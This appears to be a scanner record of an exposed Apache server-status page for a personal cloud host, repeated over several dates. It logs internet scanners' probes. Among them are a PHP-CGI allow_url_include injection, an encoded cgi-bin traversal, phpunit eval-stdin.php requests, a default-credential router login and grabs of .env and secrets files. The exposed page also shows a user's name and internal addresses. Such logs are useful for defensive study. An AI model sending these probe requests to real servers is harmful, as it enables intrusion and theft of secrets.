1.77016010043870.00.031688.14 142.93.0.66http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-33126606480/4/8257_ 1.470719475750.00.051959.19 45.148.10.235http/1.1ravignon.mycloud.paris:443GET /login.action HTTP/1.1 1-33126606480/8/7770_ 1.48414610051690.00.114064.29 45.148.10.235http/1.1ravignon.mycloud.paris:443GET /telescope/requests HTTP/1.1 1-33126606480/8/7420_ 1.3023039988860.00.102087.82 45.148.10.235h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-33126606480/6/9179_ 1.27229681160.00.091622.94 45.148.10.235http/1.1 1-33126606480/8/7169_ 1.5231779857510.00.131162.75 142.93.0.66http/1.1 1-33126606480/4/7960_ 1.2732499780420.00.041368.34 142.93.0.66http/1.1 1-33126606480/6/8049_ 1.37316610002600.00.041842.34 142.93.0.66h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-33126606480/9/7090_ 1.7322129569100.00.072005.39 142.93.0.66http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-33126606480/5/7473_ 1.7421739462310.00.032348.38 142.93.0.66http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 1-33126606480/4/7148_ 1.353012495030.00.021962.37 142.93.0.66http/1.1 1-33126606480/7/8117_ 1.5331309697970.00.091901.59 142.93.0.66h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-33126606480/6/7186_ 1.7511499875090.00.053154.32 142.93.0.66http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 1-33126606481/3/7425W 1.62009847250.00.013641.50 142.93.0.66http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-33126606480/6/7356_ 1.5231349987760.00.111235.53 142.93.0.66http/1.1 1-33126606480/7/7171_ 1.4613039586900.00.071607.22 45.148.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c480560e07b34
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Wednesday, 16-Oct-2024 13:13:07 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 330 Parent Server MPM Generation: 329 Server uptime: 327 days 6 hours 13 minutes 27 seconds Server load: 0.00 0.00 0.00 Total accesses: 566036 - Total Traffic: 62.1 GB - Total Duration: 79660113 CPU Usage: u936.95 s1837.99 cu6049.93 cs1690.07 - .0372% CPU load .02 requests/sec - 2359 B/second - 115.1 kB/request - 140.733 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02651864no0yes124000 12651865no0yes025000 Sum200 149000 _________________W________________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-32926518640/16/5746_ 3.721068868889700.00.10106.75 15.235.41.22http/1.1ravignon.mycloud.paris:443POST / HTTP/1.1 0-32926518640/12/5686_ 3.5410682448274200.00.0683.75 184.105.247.252http/1.1ravignon.mycloud.paris:443GET /geoserver/web/ HTTP/1.1 0-32926518640/16/5815_ 3.66138670430.00.1194.84 64.225.75.246h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-32926518640/17/5716_ 3.3311508568300.00.05101.91 64.225.75.246h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-32926518640/9/5786_ 3.3302318777210.00.07105.51 64.225.75.246http/1.1 0-32926518640/13/5834_ 3.66008802420.00.06124.13 64.225.75.246http/1.1 0-32926518640/30/5781_ 3.66018558760.00.0776.40 8.220.240.109http/1.1localhost:80POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_ 0-32926518640/12/5760_ 3.66008527720.00.0299.21 8.220.240.109http/1.1localhost:80POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32 0-32926518640/19/5690_ 3.67008677800.00.1590.97 8.220.240.109http/1.1localhost:80GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1 0-32926518640/10/5772_ 3.750619083000.00.04173.59 64.225.75.246http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 0-32926518640/11/5767_ 3.740728548020.00.1080.19 64.225.75.246http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 0-32926518640/16/5707_ 3.54008540690.00.0471.82 64.225.75.246h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-32926518640/15/5808_ 3.740619035490.00.0695.29 64.225.75.246http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 0-32926518640/21/5767_ 3.750648785330.00.1185.53 64.225.75.246http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 0-32926518640/10/5804_ 3.5802788716220.00.0658.12 148.153.56.82http/1.1ravignon.mycloud.paris:443GET /vr2B HTTP/1.1 0-32926518640/14/5857_ 3.67009172270.00.0396.67 8.220.240.109http/1.1localhost:80GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1 0-32926518640/21/5757_ 3.760778831790.00.05130.14 64.225.75.246http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-32926518641/13/5682W 3.59008648470.00.05117.12 64.225.75.246http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 0-32926518640/8/5729_ 3.6217381498381970.00.0890.43 212.47.70.69http/1.1 0-32926518640/10/5666_ 3.68173808847430.00.0489.18 212.47.70.69http/1.1localhost:80GET /.env HTTP/1.1 0-32926518640/23/5682_ 3.68167008358030.00.0665.46 83.144.179.227http/1.1localhost:80GET / HTTP/1.0 0-32926518640/13/5689_ 3.7111472788781930.00.0671.02 199.195.250.229http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-32926518640/24/5593_ 3.291153938313760.00.0778.82 52.189.76.10http/1.1 0-32926518640/10/5713_ 3.2911461188731690.00.0692.46 176.177.18.164http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-32926518640/8/5694_ 3.6416701558761230.00.04116.70 148.153.56.82http/1.1ravignon.mycloud.paris:443GET /jquery-3.3.2.slim.min.js HTTP/1.1 1-32926518650/6/8359_ 1.61173809820780.00.001826.83 212.47.70.69http/1.1localhost:80\x16\x03\x01\x02 1-32926518650/2/8250_ 1.4819129210064140.00.011180.25 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-32926518650/4/7196_ 1.28191209342790.00.011542.62 176.177.18.164h2ravignon.mycloud.paris:443[0/0] init 1-32926518650/11/7900_ 1.48173809707480.00.021703.88 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 1-32926518650/5/7241_ 1.61154639813300.00.011291.15 13.83.42.216http/1.1localhost:80GET / HTTP/1.1 1-32926518650/2/9236_ 1.62117209874640.00.001499.95 198.98.54.234http/1.1localhost:80GET /command_port.ini HTTP/1.1 1-32926518650/5/7494_ 1.48154519595590.00.021650.66 13.83.42.216http/1.1 1-32926518650/9/9707_ 1.5011722639729340.00.051823.75 5.181.190.29http/1.1ravignon.mycloud.paris:443GET /cgi-bin/luci/;stok=/locale HTTP/1.1 1-32926518650/12/7740_ 1.6410681879545080.00.031351.41 15.235.41.22http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 1-32926518650/4/8165_ 1.5310682889935580.00.051687.77 15.235.41.22http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 1-32926518650/4/8212_ 1.649229406110.00.011958.92 60.98.5.163http/1.1localhost:80GET / HTTP/1.0 1-32926518650/4/7699_ 1.53871039918730.00.024063.73 93.174.93.12http/1.1localhost:80\x16\x03\x02\x01o\x01 1-32926518650/3/7358_ 1.6511149869700.00.012087.37 64.225.75.246http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-32926518650/12/9127_ 1.431979572410.00.031622.55 66.240.205.34http/1.1 1-32926518650/2/7110_ 1.4502199756100.00.001162.29 64.225.75.246h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-32926518650/5/7893_ 1.5711239646550.00.021367.92 64.225.75.246http/1.1 1-32926518650/3/7987_ 1.33109886210.00.011841.90 64.225.75.246h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-32926518650/9/7023_ 1.680739421770.00.022004.93 64.225.75.246http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-32926518650/2/7415_ 1.4411819361850.00.022347.92 64.225.75.246http/1.1 1-32926518650/7/7076_ 1.0709212370310.00.051961.92 184.105.247.252http/1.1 1-32926518650/2/8055_ 1.17039586380.00.001901.08 64.225.75.246http/1.1 1-32926518650/3/7124_ 1.680629767500.00.013153.89 64.225.75.246http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 1-32926518650/6/7358_ 1.60191739746030.00.023641.01 178.211.139.188http/1.1localhost:80GET / HTTP/1.1 1-32926518650/4/7290_ 1.460859851710.00.021235.07 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-32926518650/6/7111
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c48051a528f8c
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Monday, 14-Oct-2024 06:58:57 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 328 Parent Server MPM Generation: 327 Server uptime: 324 days 23 hours 59 minutes 17 seconds Server load: 0.00 0.00 0.00 Total accesses: 564908 - Total Traffic: 62.1 GB - Total Duration: 79602012 CPU Usage: u927 s1823.07 cu6043.88 cs1688.02 - .0373% CPU load .0201 requests/sec - 2375 B/second - 115.3 kB/request - 140.911 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02643439no0yes025000 12643440no0yes124000 Sum200 149000 _____________________________W____________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-32726434390/1/5719_ 0.07736228879780.00.01106.60 65.49.1.24http/1.1 0-32726434390/1/5662_ 0.2070672638252550.00.0283.52 65.49.1.28http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-32726434390/0/5787_ 0.00756228655690.00.0094.63 149.50.103.48http/1.1localhost:80GET / HTTP/1.1 0-32726434390/2/5689_ 0.2701488558110.00.02101.77 64.227.70.2http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 0-32726434390/1/5762_ 0.13138767170.00.00105.33 64.227.70.2http/1.1 0-32726434390/1/5809_ 0.1703048789830.00.02123.96 65.49.1.27http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-32726434390/1/5739_ 0.06763228548050.00.0176.24 185.191.126.213http/1.1localhost:80GET / HTTP/1.1 0-32726434390/1/5735_ 0.0312728513170.00.0299.10 64.227.70.2h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-32726434390/1/5655_ 0.17756518652880.00.0190.68 198.235.24.108http/1.1localhost:80GET / HTTP/1.0 0-32726434390/2/5754_ 0.2336919079730.00.01173.52 185.224.128.47http/1.1localhost:80GET / HTTP/1.1 0-32726434390/0/5744_ 0.0011621728539230.00.0080.02 54.36.115.221http/1.1 0-32726434390/1/5679_ 0.07706728534680.00.0171.72 185.191.126.213http/1.1localhost:80GET / HTTP/1.1 0-32726434390/1/5779_ 0.23116218918900.00.0095.08 54.36.115.221http/1.1localhost:80POST / HTTP/1.1 0-32726434390/0/5737_ 0.0060761278771440.00.0085.33 107.170.52.177http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-32726434390/2/5781_ 0.21608178701340.00.0157.95 149.50.103.48http/1.1localhost:80GET / HTTP/1.1 0-32726434390/0/5829_ 0.0036429164640.00.0096.54 71.6.232.20http/1.1 0-32726434390/1/5725_ 0.21511718820220.00.00130.00 59.97.123.226http/1.1localhost:80GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTT 0-32726434390/1/5662_ 0.08320308641560.00.01117.04 149.50.103.48http/1.1localhost:80GET / HTTP/1.1 0-32726434390/0/5713_ 0.00320308375540.00.0090.31 202.112.238.240http/1.1 0-32726434390/1/5646_ 0.22320828841690.00.0089.07 185.16.39.146http/1.1localhost:80GET / HTTP/1.1 0-32726434390/1/5651_ 0.08511748349600.00.0065.34 54.36.115.221http/1.1localhost:80POST / HTTP/1.1 0-32726434390/1/5664_ 0.13128767850.00.0070.86 185.12.59.118http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-32726434390/1/5558_ 0.11364138306230.00.0178.70 72.75.250.21http/1.1localhost:80GET / HTTP/1.0 0-32726434390/0/5693_ 0.00607618716750.00.0092.30 81.17.19.66http/1.1 0-32726434390/1/5675_ 0.2512738750590.00.01116.55 64.227.70.2http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-32726434400/6/8337_ 0.59019813100.00.051826.74 54.36.115.221http/1.1localhost:80GET /.env HTTP/1.1 1-32726434400/3/8239_ 0.98014410058140.00.011180.18 64.227.70.2http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 1-32726434400/7/7179_ 0.7902659338660.00.071542.50 83.97.73.245http/1.1ravignon.mycloud.paris:443GET /actuator/gateway/routes HTTP/1.1 1-32726434400/5/7874_ 0.9901349701610.00.021703.79 64.227.70.2http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-32726434401/3/7217W 0.82009812360.00.011291.09 64.227.70.2http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-32726434400/4/9222_ 0.51109871190.00.011499.92 64.227.70.2http/1.1 1-32726434400/5/7476_ 0.48140109588760.00.031650.56 65.49.1.26h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-32726434400/2/9685_ 0.20140109718020.00.001823.60 65.49.1.37http/1.1 1-32726434400/4/7715_ 0.7312189537320.00.021351.28 64.227.70.2http/1.1 1-32726434400/2/8143_ 0.21109918020.00.001687.56 64.227.70.2h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-32726434400/6/8196_ 0.80029386890.00.031958.71 93.174.93.12http/1.1localhost:80GET / HTTP/1.0 1-32726434400/4/7683_ 0.9901699914980.00.014063.62 64.227.70.2http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-32726434400/4/7338_ 0.42109858330.00.022087.15 64.227.70.2h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-32726434400/5/9102_ 0.48009565760.00.011622.38 65.49.1.35h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-32726434400/6/7093_ 0.49159747810.00.041162.11 64.227.70.2h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-32726434400/7/7873_ 0.82116209635570.00.031367.80 54.36.115.221http/1.1localhost:80GET /.env HTTP/1.1 1-32726434400/2/7969_ 0.20116209876300.00.001841.76 54.36.115.221http/1.1 1-32726434400/4/6999_ 0.52109415420.00.022004.81 64.227.70.2http/1.1 1-32726434400/3/7399_ 0.9411959352110.00.012347.81 64.227.70.2http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-32726434400/4/7053_ 0.73111412361990.00.021961.79 64.227.70.2h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-32726434400/4/8042_ 0.5512999581970.00.021901.00 64.227.70.2http/1.1 1-32726434400/5/7112_ 0.55109762060.00.013153.82 85.90.246.159http/1.1localhost:80POST /any HTTP/1.1 1-32726434400/3/7336_ 0.9611949737580.00.013640.88 64.227.70.2http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 1-32726434400/7/7276_ 0.7712269846280.00.121234.98 167.99.65.60http/1.1ravignon.mycloud.paris:443GET /api/user/login HTTP/1.1 1-32726434400/2/7094_ 0.9701889477560.00.001606.76 64.227.70.2http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 2-321-0/0/2598. 0.0045713403422650.00.0051.55 185.234.216.88http/1.1 2-321-
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c4805d76fd487
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Saturday, 12-Oct-2024 06:58:57 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 326 Parent Server MPM Generation: 325 Server uptime: 322 days 23 hours 59 minutes 17 seconds Server load: 0.00 0.00 0.00 Total accesses: 563897 - Total Traffic: 62.1 GB - Total Duration: 79558299 CPU Usage: u921.82 s1812.04 cu6036.71 cs1685.37 - .0375% CPU load .0202 requests/sec - 2389 B/second - 115.5 kB/request - 141.087 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02635061no0yes025000 12635062no0yes124000 Sum200 149000 __________________________W_______________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-32526350610/2/5707_ 0.1912098877570.00.03106.56 45.156.129.128http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-32526350610/1/5651_ 0.4712458248960.00.0183.47 157.230.19.140http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-32526350610/3/5776_ 0.336591408653830.00.0594.56 71.6.134.234http/1.1 0-32526350610/0/5675_ 0.00140511348555030.00.00101.70 57.129.23.166http/1.1 0-32526350610/1/5749_ 0.33108760650.00.00105.27 157.230.19.140h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-32526350610/3/5800_ 0.3314051698785960.00.02123.90 165.227.166.107http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-32526350610/2/5727_ 0.371377208545160.00.0276.18 57.129.23.166http/1.1localhost:80GET /.env HTTP/1.1 0-32526350610/1/5721_ 0.2214048678507850.00.0299.05 164.90.235.74http/1.1 0-32526350610/0/5642_ 0.001404808647560.00.0090.61 164.90.235.74h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-32526350610/2/5745_ 0.2214048779077460.00.02173.42 164.90.235.74h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-32526350610/0/5734_ 0.00140512588537410.00.0079.99 164.90.235.74http/1.1 0-32526350610/2/5669_ 0.2014051768533200.00.0371.68 45.156.129.127http/1.1ravignon.mycloud.paris:443GET /sugar_version.json HTTP/1.1 0-32526350610/1/5767_ 0.16925218913810.00.0194.99 3.66.215.38http/1.1 0-32526350610/1/5724_ 0.2613158848766870.00.0285.29 45.156.129.127http/1.1ravignon.mycloud.paris:443GET /sitecore/shell/sitecore.version.xml HTTP/1.1 0-32526350610/2/5769_ 0.4113158858694200.00.0557.90 15.235.41.22http/1.1ravignon.mycloud.paris:443POST / HTTP/1.1 0-32526350610/1/5821_ 0.25131591889161900.00.0296.49 45.156.129.125http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-32526350610/1/5708_ 0.4013159988816130.00.02129.88 15.235.41.22http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 0-32526350610/1/5649_ 0.2413723448640280.00.01116.99 45.156.129.125http/1.1ravignon.mycloud.paris:443GET /owncloud/status.php HTTP/1.1 0-32526350610/1/5710_ 0.38137233588375540.00.0290.30 185.100.87.136http/1.1ravignon.mycloud.paris:443POST /ajax HTTP/1.1 0-32526350610/1/5630_ 0.2313772758836240.00.0288.99 57.129.23.166http/1.1 0-32526350610/0/5641_ 0.0081508347640.00.0065.29 71.6.134.234http/1.1 0-32526350610/1/5652_ 0.4581538766630.00.0070.79 71.6.134.234http/1.1localhost:80GET / HTTP/1.1 0-32526350610/0/5549_ 0.00925208302150.00.0078.62 3.66.215.38http/1.1 0-32526350610/0/5682_ 0.00925228711540.00.0092.22 3.66.215.38http/1.1 0-32526350610/2/5669_ 0.4565908746490.00.02116.52 71.6.134.234http/1.1localhost:80GET /favicon.ico HTTP/1.1 1-32526350620/6/8309_ 1.300739803390.00.031826.60 157.230.19.140http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 1-32526350621/5/8211W 0.850010051930.00.051179.99 157.230.19.140http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-32526350620/6/7143_ 1.15029315310.00.031539.36 57.129.23.166http/1.1localhost:80POST / HTTP/1.1 1-32526350620/6/7839_ 1.15029685180.00.021703.56 34.79.161.19http/1.1localhost:80GET / HTTP/1.1 1-32526350620/7/7191_ 1.1603639807170.00.051290.99 71.6.134.234http/1.1localhost:80\x16\x03\x01 1-32526350620/5/9193_ 1.300709862690.00.001499.76 157.230.19.140http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 1-32526350620/7/7445_ 1.1802529583180.00.101650.44 15.235.41.22http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 1-32526350620/6/9665_ 1.310899712690.00.051823.50 157.230.19.140http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-32526350620/5/7691_ 0.8611549529470.00.071351.15 157.230.19.140h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-32526350620/4/8110_ 1.310709914540.00.001687.49 157.230.19.140http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-32526350620/5/8173_ 1.1901719380220.00.031958.57 15.235.41.22http/1.1ravignon.mycloud.paris:443POST / HTTP/1.1 1-32526350620/3/7665_ 1.19029910290.00.014063.55 185.242.226.115http/1.1localhost:80GET / HTTP/1.1 1-32526350620/8/7310_ 1.2901749853350.00.072087.03 157.230.19.140http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 1-32526350620/5/9069_ 1.09126539557600.00.051622.24 2.57.149.127http/1.1localhost:80\x16\x03\x03 1-32526350620/4/7061_ 0.59109736970.00.031161.94 157.230.19.140http/1.1 1-32526350620/6/7836_ 1.2812269619050.00.031367.57 157.230.19.140http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-32526350620/4/7944_ 0.7811099866690.00.031841.63 157.230.19.140h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-32526350620/6/6968_ 1.1412109409790.00.072004.63 157.230.19.140http/1.1 1-32526350620/4/7368_ 0.7712779337000.00.012347.63 157.230.19.140http/1.1 1-32526350620/4/7022_ 1.111112353770.00.001961.64 157.230.19.140http/1.1 1-32526350620/5/8005_ 0.59109461910.00.051900.88 157.230.19.140http/1.1 1-32526350620/6/7088_ 1.1213539755210.00.093153.70 157.230.19.140h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-32526350620/5/7303_ 1.14009724420.00.053640.66 57.129.23.166http/1.1localhost:80GET /.env HTTP/1.1 1-32526350620/4/7245_ 1.09139830270.00.011234.76 157.230.19.140h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-32526350620/8/7067_ 1.290759465740.00.071606.57 157.230.19.140http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 2-321-0/0/2598. 0.0028433403422650.00.0051.55
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c48055c2c4e63
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Thursday, 10-Oct-2024 05:22:35 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 324 Parent Server MPM Generation: 323 Server uptime: 320 days 22 hours 22 minutes 56 seconds Server load: 0.00 0.00 0.00 Total accesses: 562709 - Total Traffic: 62.1 GB - Total Duration: 79506260 CPU Usage: u915.23 s1800.5 cu6029.8 cs1682.44 - .0376% CPU load .0203 requests/sec - 2404 B/second - 115.7 kB/request - 141.292 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02626678no0yes025000 12626679no0yes124000 Sum200 149000 _____________________________________W____________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-32326266780/2/5688_ 0.22453028871220.00.02106.45 54.36.115.221http/1.1localhost:80POST / HTTP/1.1 0-32326266780/1/5640_ 0.12491008237610.00.0083.39 78.153.140.151http/1.1localhost:80GET /client_secrets.json HTTP/1.1 0-32326266780/1/5759_ 0.2249101438646550.00.0294.45 185.242.226.117http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-32326266780/1/5663_ 0.12453008547250.00.00101.62 54.36.115.221http/1.1 0-32326266780/1/5738_ 0.23123908752430.00.00105.17 207.192.240.242http/1.1localhost:80HEAD /invoker/EJBInvokerServlet HTTP/1.1 0-32326266780/2/5786_ 0.12123908785240.00.02123.85 207.192.240.242http/1.1 0-32326266780/2/5714_ 0.23120908540710.00.0076.12 207.192.240.242http/1.1localhost:80HEAD /invoker/JMXInvokerServlet HTTP/1.1 0-32326266780/1/5712_ 0.13120938501110.00.0098.96 207.192.240.242http/1.1 0-32326266780/2/5631_ 0.15566148641660.00.0090.53 141.98.11.79http/1.1localhost:80GET / HTTP/1.1 0-32326266780/1/5733_ 0.10103519076520.00.01173.38 78.153.140.151http/1.1 0-32326266780/2/5716_ 0.16104828528470.00.0179.86 47.245.122.65http/1.1 0-32326266780/2/5654_ 0.2510352538421220.00.0271.62 185.234.216.100http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-32326266780/2/5752_ 0.18118913650.00.0094.95 178.128.207.138http/1.1 0-32326266780/1/5713_ 0.10108765940.00.0085.24 178.128.207.138http/1.1 0-32326266780/3/5757_ 0.260708686200.00.0157.78 178.128.207.138http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 0-32326266780/1/5801_ 0.10009155520.00.0096.40 78.153.140.151http/1.1 0-32326266780/2/5695_ 0.181067308813190.00.00129.81 185.224.128.67http/1.1localhost:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 0-32326266780/1/5639_ 0.111066808636880.00.00116.92 78.153.140.151http/1.1 0-32326266780/2/5692_ 0.18996508368920.00.0090.24 54.36.115.221http/1.1localhost:80GET /.env HTTP/1.1 0-32326266780/1/5616_ 0.11996508831670.00.0088.86 54.36.115.221http/1.1 0-32326266780/2/5630_ 0.19996538345740.00.0065.24 54.36.115.221http/1.1localhost:80POST / HTTP/1.1 0-32326266780/1/5635_ 0.11996518762020.00.0070.71 54.36.115.221http/1.1 0-32326266780/1/5541_ 0.15859818300880.00.0078.59 88.80.189.24http/1.1 0-32326266780/2/5671_ 0.20566638705070.00.0092.13 141.98.11.15http/1.1localhost:80GET / HTTP/1.1 0-32326266780/0/5656_ 0.00566108744870.00.00116.49 78.153.140.151http/1.1 1-32326266790/4/8280_ 0.6712699796630.00.031826.46 178.128.207.138http/1.1 1-32326266790/4/8185_ 0.441010038730.00.001179.72 178.128.207.138http/1.1 1-32326266790/6/7110_ 0.781789308820.00.021539.16 178.128.207.138http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-32326266790/4/7792_ 0.5489919676420.00.031703.36 207.192.240.242http/1.1 1-32326266790/4/7157_ 0.65139794240.00.031290.79 178.128.207.138h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-32326266790/6/9163_ 0.72009855130.00.051499.64 54.36.115.221http/1.1localhost:80GET /.env HTTP/1.1 1-32326266790/5/7408_ 0.8001359565700.00.011650.15 178.128.207.138http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-32326266790/6/9618_ 0.790619693710.00.021823.20 178.128.207.138http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 1-32326266790/4/7646_ 0.4711239511120.00.031350.84 178.128.207.138h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-32326266790/6/8072_ 0.72029904130.00.031687.30 54.36.115.221http/1.1localhost:80POST / HTTP/1.1 1-32326266790/4/8148_ 0.46109365450.00.021958.38 54.36.115.221http/1.1 1-32326266790/6/7636_ 0.8001369905570.00.014063.45 178.128.207.138http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-32326266791/4/7280W 0.45009841490.00.022086.83 